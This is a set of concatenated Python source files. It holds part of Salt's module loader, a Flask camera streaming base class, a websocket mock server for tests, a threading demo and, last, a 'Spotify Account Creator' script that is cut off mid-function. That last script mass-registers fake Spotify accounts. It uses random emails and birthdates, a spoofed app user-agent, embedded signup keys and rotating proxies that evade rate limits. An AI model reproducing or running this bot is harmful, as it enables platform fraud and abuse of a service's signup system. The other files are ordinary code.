fpath, suffix = self.file_mapping[name][:2]
# if the fpath has `.cpython-3x` in it, but the running Py version
# is 3.y, the following will cause us to return immediately and we won't try to import this .pyc.
# This is for the unusual case where several Python versions share a single
# source tree and drop their .pycs in the same __pycache__ folder.
# If we were to load a .pyc for another Py version it's not a big problem
# but the log will get spammed with "Bad Magic Number" messages that
# can be very misleading if the user is debugging another problem.
try:
(implementation_tag, cache_tag_ver) = sys.implementation.cache_tag.split(
"-"
)
if cache_tag_ver not in fpath and implementation_tag in fpath:
log.trace(
"Trying to load %s on %s, returning False.",
fpath,
sys.implementation.cache_tag,
)
return False
except AttributeError:
# Most likely Py 2.7 or some other Python version we don't really support
pass
self.loaded_files.add(name)
fpath_dirname = os.path.dirname(fpath)
try:
self.__populate_sys_path()
sys.path.append(fpath_dirname)
if suffix == ".pyx":
mod = pyximport.load_module(name, fpath, tempfile.gettempdir())
elif suffix == ".o":
top_mod = __import__(fpath, globals(), locals(), [])
comps = fpath.split(".")
if len(comps) < 2:
mod = top_mod
else:
mod = top_mod
for subname in comps[1:]:
mod = getattr(mod, subname)
elif suffix == ".zip":
mod = zipimporter(fpath).load_module(name)
else:
desc = self.suffix_map[suffix]
# if it is a directory, we don't open a file
try:
mod_namespace = ".".join(
(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
)
except TypeError:
mod_namespace = "{}.{}.{}.{}".format(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
if suffix == "":
# pylint: disable=no-member
# Package directory, look for __init__
loader_details = [
(
importlib.machinery.SourceFileLoader,
importlib.machinery.SOURCE_SUFFIXES,
),
(
importlib.machinery.SourcelessFileLoader,
importlib.machinery.BYTECODE_SUFFIXES,
),
(
importlib.machinery.ExtensionFileLoader,
importlib.machinery.EXTENSION_SUFFIXES,
),
]
file_finder = importlib.machinery.FileFinder(
fpath_dirname, *loader_details
)
spec = file_finder.find_spec(mod_namespace)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = spec.loader.load_module()
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
# reload all submodules if necessary
if not self.initial_load:
self._reload_submodules(mod)
else:
# pylint: disable=no-member
loader = MODULE_KIND_MAP[desc[2]](mod_namespace, fpath)
spec = importlib.util.spec_from_file_location(
mod_namespace, fpath, loader=loader
)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = self.run(spec.loader.load_module)
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
except OSError:
raise
except ImportError as exc:
if "magic number" in str(exc):
error_msg = "Failed to import {} {}. Bad magic number. If migrating from Python2 to Python3, remove all .pyc files and try again.".format(
self.tag, name
)
log.warning(error_msg)
self.missing_modules[name] = error_msg
log.debug("Failed to import %s %s:\n", self.tag, name, exc_info=True)
self.missing_modules[name] = exc
return False
except Exception as error: # pylint: disable=broad-except
log.error(
"Failed to import %s %s, this is due most likely to a "
"syntax error:\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
except SystemExit as error:
try:
fn_, _, caller, _ = traceback.extract_tb(sys.exc_info()[2])[-1]
except Exception: # pylint: disable=broad-except
pass
else:
tgt_fn = os.path.join("salt", "utils", "process.py")
if fn_.endswith(tgt_fn) and "_handle_signals" in caller:
                    # Race condition, SIGTERM or SIGINT received while loader
# was in process of loading a module. Call sys.exit to
# ensure that the process is killed.
sys.exit(salt.defaults.exitcodes.EX_OK)
log.error(
"Failed to import %s %s as the module called exit()\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
finally:
sys.path.remove(fpath_dirname)
self.__clean_sys_path()
loader_context = salt.loader_context.LoaderContext()
if hasattr(mod, "__salt_loader__"):
if not isinstance(mod.__salt_loader__, salt.loader_context.LoaderContext):
log.warning("Override __salt_loader__: %s", mod)
mod.__salt_loader__ = loader_context
else:
mod.__salt_loader__ = loader_context
if hasattr(mod, "__opts__"):
if not isinstance(mod.__opts__, salt.loader_context.NamedLoaderContext):
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = copy.deepcopy(mod.__opts__)
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
else:
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = {}
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
# pack whatever other globals we were asked to
for p_name, p_value in self.pack.items():
mod_named_context = getattr(mod, p_name, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(p_name, default)
if mod_named_context is None:
setattr(mod, p_name, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", p_name, mod)
setattr(mod, p_name, named_context)
else:
setattr(mod, p_name, named_context)
if self.pack_self is not None:
mod_named_context = getattr(mod, self.pack_self, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(self.pack_self, default)
if mod_named_context is None:
setattr(mod, self.pack_self, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", self.pack_self, mod)
setattr(mod, self.pack_self, named_context)
else:
setattr(mod, self.pack_self, named_context)
module_name = mod.__name__.rsplit(".", 1)[-1]
# Call a module's initialization method if it exists
module_init = getattr(mod, "__init__", None)
if inspect.isfunction(module_init):
try:
self.run(module_init, self.opts)
except TypeError as e:
log.error(e)
except Exception: # pylint: disable=broad-except
err_string = "__init__ failed"
log.debug(
"Error loading %s.%s: %s",
self.tag,
module_name,
err_string,
exc_info=True,
)
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
# if virtual modules are enabled, we need to look for the
# __virtual__() function inside that module and run it.
if self.virtual_enable:
virtual_funcs_to_process = ["__virtual__"] + self.virtual_funcs
for virtual_func in virtual_funcs_to_process:
(
virtual_ret,
module_name,
virtual_err,
virtual_aliases,
) = self._process_virtual(mod, module_name, virtual_func)
if virtual_err is not None:
log.trace(
"Error loading %s.%s: %s", self.tag, module_name, virtual_err
)
# if _process_virtual returned a non-True value then we are
# supposed to not process this module
if virtual_ret is not True and module_name not in self.missing_modules:
# If a module has information about why it could not be loaded, record it
self.missing_modules[module_name] = virtual_err
self.missing_modules[name] = virtual_err
return False
else:
virtual_aliases = ()
# If this is a proxy minion then MOST modules cannot work. Therefore, require that
# any module that does work with salt-proxy-minion define __proxyenabled__ as a list
# containing the names of the proxy types that the module supports.
#
# Render modules and state modules are OK though
if "proxy" in self.opts:
if self.tag in ["grains", "proxy"]:
if not hasattr(mod, "__proxyenabled__") or (
self.opts["proxy"]["proxytype"] not in mod.__proxyenabled__
and "*" not in mod.__proxyenabled__
):
err_string = "not a proxy_minion enabled module"
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
if getattr(mod, "__load__", False) is not False:
log.info(
"The functions from module '%s' are being loaded from the "
"provided __load__ attribute",
module_name,
)
# If we had another module by the same virtual name, we should put any
# new functions under the existing dictionary.
mod_names = [module_name] + list(virtual_aliases)
mod_dict = {
x: self.loaded_modules.get(x, self.mod_dict_class()) for x in mod_names
}
for attr in getattr(mod, "__load__", dir(mod)):
if attr.startswith("_"):
# private functions are skipped
continue
func = getattr(mod, attr)
if not inspect.isfunction(func) and not isinstance(func, functools.partial):
# Not a function!? Skip it!!!
continue
# Let's get the function name.
# If the module has the __func_alias__ attribute, it must be a
# dictionary mapping in the form of(key -> value):
# <real-func-name> -> <desired-func-name>
#
            # It defaults, of course, to the found callable attribute name
# if no alias is defined.
funcname = getattr(mod, "__func_alias__", {}).get(attr, attr)
for tgt_mod in mod_names:
try:
full_funcname = ".".join((tgt_mod, funcname))
except TypeError:
full_funcname = "{}.{}".format(tgt_mod, funcname)
# Save many references for lookups
# Careful not to overwrite existing (higher priority) functions
if full_funcname not in self._dict:
self._dict[full_funcname] = func
if funcname not in mod_dict[tgt_mod]:
setattr(mod_dict[tgt_mod], funcname, func)
mod_dict[tgt_mod][funcname] = func
self._apply_outputter(func, mod)
# enforce depends
try:
Depends.enforce_dependencies(self._dict, self.tag, name)
except RuntimeError as exc:
log.info(
"Depends.enforce_dependencies() failed for the following " "reason: %s",
exc,
)
for tgt_mod in mod_names:
self.loaded_modules[tgt_mod] = mod_dict[tgt_mod]
return True
def _load(self, key):
"""
Load a single item if you have it
"""
# if the key doesn't have a '.' then it isn't valid for this mod dict
if not isinstance(key, str):
raise KeyError("The key must be a string.")
if "." not in key:
raise KeyError("The key '{}' should contain a '.'".format(key))
mod_name, _ = key.split(".", 1)
with self._lock:
# It is possible that the key is in the dictionary after
# acquiring the lock due to another thread loading it.
if mod_name in self.missing_modules or key in self._dict:
return True
# if the modulename isn't in the whitelist, don't bother
if self.whitelist and mod_name not in self.whitelist:
log.error(
"Failed to load function %s because its module (%s) is "
"not in the whitelist: %s",
key,
mod_name,
self.whitelist,
)
raise KeyError(key)
def _inner_load(mod_name):
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and key in self._dict:
return True
return False
# try to load the module
ret = None
reloaded = False
# re-scan up to once, IOErrors or a failed load cause re-scans of the
# filesystem
while True:
try:
ret = _inner_load(mod_name)
if not reloaded and ret is not True:
self._refresh_file_mapping()
reloaded = True
continue
break
except OSError:
if not reloaded:
self._refresh_file_mapping()
reloaded = True
continue
return ret
def _load_all(self):
"""
Load all of them
"""
with self._lock:
for name in self.file_mapping:
if name in self.loaded_files or name in self.missing_modules:
continue
self._load_module(name)
self.loaded = True
def reload_modules(self):
with self._lock:
self.loaded_files = set()
self._load_all()
def _apply_outputter(self, func, mod):
"""
Apply the __outputter__ variable to the functions
"""
if hasattr(mod, "__outputter__"):
outp = mod.__outputter__
if func.__name__ in outp:
func.__outputter__ = outp[func.__name__]
def _process_virtual(self, mod, module_name, virtual_func="__virtual__"):
"""
Given a loaded module and its default name determine its virtual name
This function returns a tuple. The first value will be either True or
False and will indicate if the module should be loaded or not (i.e. if
        it threw an exception while processing its __virtual__ function). The
second value is the determined virtual name, which may be the same as
the value provided.
The default name can be calculated as follows::
module_name = mod.__name__.rsplit('.', 1)[-1]
"""
# The __virtual__ function will return either a True or False value.
# If it returns a True value it can also set a module level attribute
# named __virtualname__ with the name that the module should be
# referred to as.
#
# This allows us to have things like the pkg module working on all
# platforms under the name 'pkg'. It also allows for modules like
# augeas_cfg to be referred to as 'augeas', which would otherwise have
# namespace collisions. And finally it allows modules to return False
# if they are not intended to run on the given platform or are missing
# dependencies.
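        #
        # For illustration only (a hypothetical execution module, not part of
        # this loader), the pieces typically look along these lines:
        #
        #     __virtualname__ = "pkg"
        #
        #     def __virtual__():
        #         if salt.utils.path.which("apt-get"):
        #             return __virtualname__
        #         return False, "The apt-get binary could not be found"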
virtual_aliases = getattr(mod, "__virtual_aliases__", tuple())
try:
error_reason = None
if hasattr(mod, "__virtual__") and inspect.isfunction(mod.__virtual__):
try:
start = time.time()
virtual_attr = getattr(mod, virtual_func)
virtual = self.run(virtual_attr)
if isinstance(virtual, tuple):
error_reason = virtual[1]
virtual = virtual[0]
if self.opts.get("virtual_timer", False):
end = time.time() - start
msg = "Virtual function took {} seconds for {}".format(
end, module_name
)
log.warning(msg)
except Exception as exc: # pylint: disable=broad-except
error_reason = (
"Exception raised when processing __virtual__ function"
" for {}. Module will not be loaded: {}".format(
mod.__name__, exc
)
)
log.error(error_reason, exc_info_on_loglevel=logging.DEBUG)
virtual = None
# Get the module's virtual name
virtualname = getattr(mod, "__virtualname__", virtual)
if not virtual:
# if __virtual__() evaluates to False then the module
# wasn't meant for this platform or it's not supposed to
# load for some other reason.
# Some modules might accidentally return None and are
# improperly loaded
if virtual is None:
log.warning(
"%s.__virtual__() is wrongly returning `None`. "
"It should either return `True`, `False` or a new "
"name. If you're the developer of the module "
"'%s', please fix this.",
mod.__name__,
module_name,
)
return (False, module_name, error_reason, virtual_aliases)
# At this point, __virtual__ did not return a
# boolean value, let's check for deprecated usage
# or module renames
if virtual is not True and module_name != virtual:
# The module is renaming itself. Updating the module name
# with the new name
log.trace("Loaded %s as virtual %s", module_name, virtual)
if virtualname != virtual:
# The __virtualname__ attribute does not match what's
# being returned by the __virtual__() function. This
# should be considered an error.
log.error(
"The module '%s' is showing some bad usage. Its "
"__virtualname__ attribute is set to '%s' yet the "
"__virtual__() function is returning '%s'. These "
"values should match!",
mod.__name__,
virtualname,
virtual,
)
module_name = virtualname
# If the __virtual__ function returns True and __virtualname__
# is set then use it
elif virtual is True and virtualname != module_name:
if virtualname is not True:
module_name = virtualname
except KeyError:
# Key errors come out of the virtual function when passing
# in incomplete grains sets, these can be safely ignored
# and logged to debug, still, it includes the traceback to
# help debugging.
log.debug("KeyError when loading %s", module_name, exc_info=True)
except Exception: # pylint: disable=broad-except
# If the module throws an exception during __virtual__()
# then log the information and continue to the next.
log.error(
"Failed to read the virtual function for %s: %s",
self.tag,
module_name,
exc_info=True,
)
return (False, module_name, error_reason, virtual_aliases)
return (True, module_name, None, virtual_aliases)
def run(self, method, *args, **kwargs):
"""
Run the method in this loader's context
"""
self._last_context = contextvars.copy_context()
return self._last_context.run(self._run_as, method, *args, **kwargs)
def _run_as(self, method, *args, **kwargs):
"""
Handle setting up the context properly and call the method
"""
self.parent_loader = None
try:
current_loader = salt.loader_context.loader_ctxvar.get()
except LookupError:
current_loader = None
if current_loader is not self:
self.parent_loader = current_loader
token = salt.loader_context.loader_ctxvar.set(self)
try:
return method(*args, **kwargs)
finally:
self.parent_loader = None
salt.loader_context.loader_ctxvar.reset(token)
def run_in_thread(self, method, *args, **kwargs):
"""
Run the function in a new thread with the context of this loader
"""
argslist = [self, method]
argslist.extend(args)
thread = threading.Thread(target=self.target, args=argslist, kwargs=kwargs)
thread.start()
return thread
@staticmethod
def target(loader, method, *args, **kwargs):
loader.run(method, *args, **kwargs)
def global_injector_decorator(inject_globals):
"""
Decorator used by the LazyLoader to inject globals into a function at
execute time.
globals
Dictionary with global variables to inject
"""
def inner_decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
with salt.utils.context.func_globals_inject(f, **inject_globals):
return f(*args, **kwargs)
return wrapper
return inner_decorator
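# Illustrative usage sketch (the function and globals below are hypothetical,
# not part of the loader): injecting dunder globals into a plain function so
# they are only visible while the wrapped call runs:
#
#     wrapped = global_injector_decorator({"__opts__": {"test": True}})(my_func)
#     wrapped()   # inside my_func, __opts__ resolves to {"test": True}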
|
base_camera.py
|
from flask_login import logout_user
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
            if not event[0].is_set():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
if time.time() - BaseCamera.last_access > 10:
frames_iterator.close()
logout_user() # logout the current user too
print('Stopping camera thread due to inactivity.')
break
BaseCamera.thread = None
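# Illustrative sketch, not part of the original module: the smallest possible
# BaseCamera subclass, showing how frames() is expected to be implemented.
# The payload below is a placeholder, not a real encoded image.
class ExampleStaticCamera(BaseCamera):
    """Yield the same placeholder frame roughly once per second."""

    @staticmethod
    def frames():
        placeholder = b'\xff\xd8\xff\xd9'  # stand-in bytes for a JPEG frame
        while True:
            yield placeholder
            time.sleep(1)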
|
humming_ws_server.py
|
import asyncio
import unittest.mock
from threading import Thread
import websockets
from test.integration.humming_web_app import get_open_port
import json
from urllib.parse import urlparse
class HummingWsServerFactory:
_orig_ws_connect = websockets.connect
_ws_servers = {}
host = "127.0.0.1"
# url_host_only is used for creating one HummingWSServer to handle all websockets requests and responses for
# a given url host.
url_host_only = False
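    # For example (hypothetical URLs): with url_host_only = True, both
    # "wss://stream.example.com/ws/v1" and "wss://stream.example.com/ws/v2"
    # resolve to the single server registered under "stream.example.com".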
@staticmethod
def get_ws_server(url):
if HummingWsServerFactory.url_host_only:
url = urlparse(url).netloc
return HummingWsServerFactory._ws_servers.get(url)
@staticmethod
def start_new_server(url):
port = get_open_port()
ws_server = HummingWsServer(HummingWsServerFactory.host, port)
if HummingWsServerFactory.url_host_only:
url = urlparse(url).netloc
HummingWsServerFactory._ws_servers[url] = ws_server
ws_server.start()
return ws_server
@staticmethod
def reroute_ws_connect(url, **kwargs):
ws_server = HummingWsServerFactory.get_ws_server(url)
if ws_server is None:
return HummingWsServerFactory._orig_ws_connect(url, **kwargs)
kwargs.clear()
return HummingWsServerFactory._orig_ws_connect(f"ws://{ws_server.host}:{ws_server.port}", **kwargs)
@staticmethod
async def send_str(url, message, delay=0):
if delay > 0:
await asyncio.sleep(delay)
ws_server = HummingWsServerFactory.get_ws_server(url)
await ws_server.websocket.send(message)
@staticmethod
def send_str_threadsafe(url, msg, delay=0):
ws_server = HummingWsServerFactory.get_ws_server(url)
asyncio.run_coroutine_threadsafe(HummingWsServerFactory.send_str(url, msg, delay), ws_server.ev_loop)
@staticmethod
async def send_json(url, data, delay=0):
try:
if delay > 0:
await asyncio.sleep(delay)
ws_server = HummingWsServerFactory.get_ws_server(url)
message = json.dumps(data)
await ws_server.websocket.send(message)
except Exception as e:
print(f"HummingWsServerFactory Error: {str(e)}")
raise e
@staticmethod
def send_json_threadsafe(url, data, delay=0):
ws_server = HummingWsServerFactory.get_ws_server(url)
asyncio.run_coroutine_threadsafe(HummingWsServerFactory.send_json(url, data, delay), ws_server.ev_loop)
class HummingWsServer:
def __init__(self, host, port):
        self.ev_loop = None  # assigned the server's event loop once _start() runs
self._started: bool = False
self.host = host
self.port = port
self.websocket = None
self.stock_responses = {}
def add_stock_response(self, request, json_response):
self.stock_responses[request] = json_response
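    # For example (hypothetical request/response values):
    #     server.add_stock_response("subscribe", {"result": "ok"})
    # makes any incoming message containing "subscribe" get that JSON reply.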
async def _handler(self, websocket, path):
self.websocket = websocket
async for msg in self.websocket:
stock_responses = [v for k, v in self.stock_responses.items() if k in msg]
if len(stock_responses) > 0:
await websocket.send(json.dumps(stock_responses[0]))
print('websocket connection closed')
return self.websocket
@property
def started(self) -> bool:
return self._started
    def _start(self):
        self.ev_loop = asyncio.new_event_loop()
        asyncio.set_event_loop(self.ev_loop)
        asyncio.ensure_future(websockets.serve(self._handler, self.host, self.port))
        self._started = True  # mark the server as running before entering the loop
        self.ev_loop.run_forever()
async def wait_til_started(self):
while not self._started:
await asyncio.sleep(0.1)
async def _stop(self):
self.port = None
self._started = False
self.ev_loop.stop()
def start(self):
if self.started:
self.stop()
thread = Thread(target=self._start)
thread.daemon = True
thread.start()
def stop(self):
asyncio.run_coroutine_threadsafe(self._stop(), self.ev_loop)
class HummingWsServerTest(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.ev_loop: asyncio.AbstractEventLoop = asyncio.get_event_loop()
cls.ws_server = HummingWsServerFactory.start_new_server("ws://www.google.com/ws/")
cls._patcher = unittest.mock.patch("websockets.connect", autospec=True)
cls._mock = cls._patcher.start()
cls._mock.side_effect = HummingWsServerFactory.reroute_ws_connect
@classmethod
def tearDownClass(cls) -> None:
cls._patcher.stop()
async def _test_web_socket(self):
uri = "ws://www.google.com/ws/"
async with websockets.connect(uri) as websocket:
await HummingWsServerFactory.send_str(uri, "aaa")
answer = await websocket.recv()
print(answer)
self.assertEqual("aaa", answer)
await HummingWsServerFactory.send_json(uri, data={"foo": "bar"})
answer = await websocket.recv()
print(answer)
answer = json.loads(answer)
self.assertEqual(answer["foo"], "bar")
await self.ws_server.websocket.send("xxx")
answer = await websocket.recv()
print(answer)
self.assertEqual("xxx", answer)
def test_web_socket(self):
asyncio.get_event_loop().run_until_complete(self._test_web_socket())
if __name__ == '__main__':
unittest.main()
|
t04.py
|
import threading
import time
def loop():
print(f"thread {threading.currentThread().name} is running...")
n = 0
while n < 5:
n = n + 1
print(f"thread {threading.currentThread().name} >>> {n}")
time.sleep(1)
print(f"thread {threading.currentThread().name} ended")
print(f"thread {threading.currentThread().name} is running...")
t = threading.Thread(target=loop, name='LoopThread')
t.start()
t.join()
print(f"thread {threading.currentThread().name} ended")
|
main.py
|
from sys import stdout
from requests import post
from os import system, _exit, path
from random import choice, randint
from colors import green, red, reset
from time import time, sleep, strftime, gmtime
from threading import Thread, Lock, active_count
from string import ascii_letters, ascii_lowercase, digits
system('cls && title [Spotify Account Creator] - Main Menu')
headers = {'User-agent': 'S4A/2.0.15 (com.spotify.s4a; build:201500080; iOS 13.4.0) Alamofire/4.9.0', 'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8', 'Accept': 'application/json, text/plain;q=0.2, */*;q=0.1', 'App-Platform': 'IOS', 'Spotify-App': 'S4A', 'Accept-Language': 'en-TZ;q=1.0', 'Accept-Encoding': 'gzip;q=1.0, compress;q=0.5', 'Spotify-App-Version': '2.0.15'}
domains = ['gmail.com', 'yahoo.com', 'hotmail.com', 'hotmail.co.uk', 'hotmail.fr', 'outlook.com', 'icloud.com', 'mail.com', 'live.com', 'yahoo.it', 'yahoo.ca', 'yahoo.in', 'live.se', 'orange.fr', 'msn.com', 'mail.ru', 'mac.com']
lock = Lock()
class Main:
def __init__(self):
self.variables = {
'proxies': [],
'proxy_num': 0,
'created': 0,
'retries': 0,
'cpm': 0,
'unlimited': False
}
logo = '''
______ __ __ ______ ______ __
/ \ | \ | \/ \ / \ | \
| ▓▓▓▓▓▓\ ______ ______ _| ▓▓_ \▓▓ ▓▓▓▓▓▓\__ __ | ▓▓▓▓▓▓\ ______ _______ ______ ______ ______ _| ▓▓_ ______ ______
| ▓▓___\▓▓/ \ / \| ▓▓ \ | \ ▓▓_ \▓▓ \ | \ | ▓▓ __\▓▓/ \| \ / \ / \ | \| ▓▓ \ / \ / \
\▓▓ \| ▓▓▓▓▓▓\ ▓▓▓▓▓▓\\▓▓▓▓▓▓ | ▓▓ ▓▓ \ | ▓▓ | ▓▓ | ▓▓| \ ▓▓▓▓▓▓\ ▓▓▓▓▓▓▓\ ▓▓▓▓▓▓\ ▓▓▓▓▓▓\ \▓▓▓▓▓▓\\▓▓▓▓▓▓ | ▓▓▓▓▓▓\ ▓▓▓▓▓▓\
_\▓▓▓▓▓▓\ ▓▓ | ▓▓ ▓▓ | ▓▓ | ▓▓ __| ▓▓ ▓▓▓▓ | ▓▓ | ▓▓ | ▓▓ \▓▓▓▓ ▓▓ ▓▓ ▓▓ | ▓▓ ▓▓ ▓▓ ▓▓ \▓▓/ ▓▓ | ▓▓ __| ▓▓ | ▓▓ ▓▓ \▓▓
| \__| ▓▓ ▓▓__/ ▓▓ ▓▓__/ ▓▓ | ▓▓| \ ▓▓ ▓▓ | ▓▓__/ ▓▓ | ▓▓__| ▓▓ ▓▓▓▓▓▓▓▓ ▓▓ | ▓▓ ▓▓▓▓▓▓▓▓ ▓▓ | ▓▓▓▓▓▓▓ | ▓▓| \ ▓▓__/ ▓▓ ▓▓
\▓▓ ▓▓ ▓▓ ▓▓\▓▓ ▓▓ \▓▓ ▓▓ ▓▓ ▓▓ \▓▓ ▓▓ \▓▓ ▓▓\▓▓ \ ▓▓ | ▓▓\▓▓ \ ▓▓ \▓▓ ▓▓ \▓▓ ▓▓\▓▓ ▓▓ ▓▓
\▓▓▓▓▓▓| ▓▓▓▓▓▓▓ \▓▓▓▓▓▓ \▓▓▓▓ \▓▓\▓▓ _\▓▓▓▓▓▓▓ \▓▓▓▓▓▓ \▓▓▓▓▓▓▓\▓▓ \▓▓ \▓▓▓▓▓▓▓\▓▓ \▓▓▓▓▓▓▓ \▓▓▓▓ \▓▓▓▓▓▓ \▓▓
| ▓▓ | \__| ▓▓
| ▓▓ \▓▓ ▓▓
\▓▓ \▓▓▓▓▓▓
'''
print('%s%s' % (green(), logo))
print('\n\n %s[%s1%s] HTTP\n [%s2%s] SOCKS4\n [%s3%s] SOCKS5\n\n%s> %sSelect a Proxy Type%s: ' % (green(), reset(), green(), reset(), green(), reset(), green(), reset(), green(), reset()), end = '')
self.proxy_type = str(input())
if self.proxy_type.upper() in ['1', 'HTTP']:
self.proxy_type = 'http'
elif self.proxy_type.upper() in ['2', 'SOCKS4']:
self.proxy_type = 'socks4'
elif self.proxy_type.upper() in ['3', 'SOCKS5']:
self.proxy_type = 'socks5'
else:
print('\n%s> %sInvalid input%s.' % (reset(), red(), reset()))
system('title [Spotify Account Creator] - Exiting . . .')
sleep(3)
_exit(0)
print('%s> %sAmount to create (empty for unlimited)%s: ' % (reset(), green(), reset()), end = '')
self.amount = str(input())
print()
if self.amount == '':
self.variables['unlimited'] = True
self.amount = 0
elif self.amount != '' and not self.amount.isdigit():
print('%s> %sInvalid input%s.' % (reset(), red(), reset()))
system('title [Spotify Account Creator] - Exiting . . .')
sleep(3)
_exit(0)
def setup(self):
if path.exists('Proxies.txt'):
with open('Proxies.txt', 'r', encoding = 'UTF-8') as f:
for line in f.read().splitlines():
if line != '':
self.variables['proxies'].append(line)
if len(self.variables['proxies']) == 0:
self.error_import(False)
else:
self.error_import(True)
def error_import(self, create):
if create:
open('Proxies.txt', 'a').close()
print('%s> %sPaste your proxies inside Proxies.txt%s!' % (reset(), red(), reset()))
system('title [Spotify Account Creator] - Exiting . . .')
sleep(3)
_exit(0)
def write(self, arg):
lock.acquire()
stdout.flush()
        stdout.write('%s\n' % (arg.encode('ascii', 'replace').decode())) # Replace non-ASCII characters to avoid console printing errors on Windows
lock.release()
def cpm_counter(self):
if self.variables['unlimited']:
while True:
old = self.variables['created']
sleep(4)
new = self.variables['created']
self.variables['cpm'] = ((new - old) * 15)
else:
while self.variables['created'] != int(self.amount):
old = self.variables['created']
sleep(4)
new = self.variables['created']
self.variables['cpm'] = ((new - old) * 15)
def update_title(self):
if self.variables['unlimited']:
while True:
elapsed = strftime('%H:%M:%S', gmtime(time() - self.start))
system('title [Spotify Account Creator] - Created: %s ^| Retries: %s ^| CPM: %s ^| Time Elapsed: %s ^| Threads: %s' % (self.variables['created'], self.variables['retries'], self.variables['cpm'], elapsed, (active_count() - 2)))
sleep(0.4)
else:
while self.variables['created'] != int(self.amount):
elapsed = strftime('%H:%M:%S', gmtime(time() - self.start))
system('title [Spotify Account Creator] - Created: %s/%s ^| Retries: %s ^| CPM: %s ^| Time Elapsed: %s ^| Threads: %s' % (self.variables['created'], self.amount, self.variables['retries'], self.variables['cpm'], elapsed, (active_count() - 2)))
sleep(0.4)
elapsed = strftime('%H:%M:%S', gmtime(time() - self.start))
system('title [Spotify Account Creator] - Created: %s/%s ^| Retries: %s ^| CPM: %s ^| Time Elapsed: %s ^| Threads: %s' % (self.variables['created'], self.amount, self.variables['retries'], self.variables['cpm'], elapsed, (active_count() - 2)))
def retry(self):
self.variables['retries'] += 1
self.creator(choice(self.variables['proxies']))
def creator(self, proxy):
email = '%s@%s' % (''.join(choice(ascii_lowercase + digits) for _ in range(randint(7, 10))), choice(domains))
password = ''.join(choice(ascii_letters + digits) for _ in range(randint(8, 14)))
birth_year = randint(1970, 2005)
birth_month = randint(1, 12)
birth_day = randint(1, 28)
gender = choice(['male', 'female'])
data = 'creation_point=lite_7e7cf598605d47caba394c628e2735a2&password_repeat=%s&platform=Android-ARM&iagree=true&password=%s&gender=%s&key=a2d4b979dc624757b4fb47de483f3505&birth_day=%s&birth_month=%s&email=%s&birth_year=%s' % (password, password, gender, birth_day, birth_month, email, birth_year)
try:
create = post('https://spclient.wg.spotify.com/signup/public/v1/account', data = data, headers = headers, proxies = {'https': '%s://%s' % (self.proxy_type, proxy)}, timeout = 5)
if create.json()['status'] == 1:
username = create.json()['username']
if username != '':
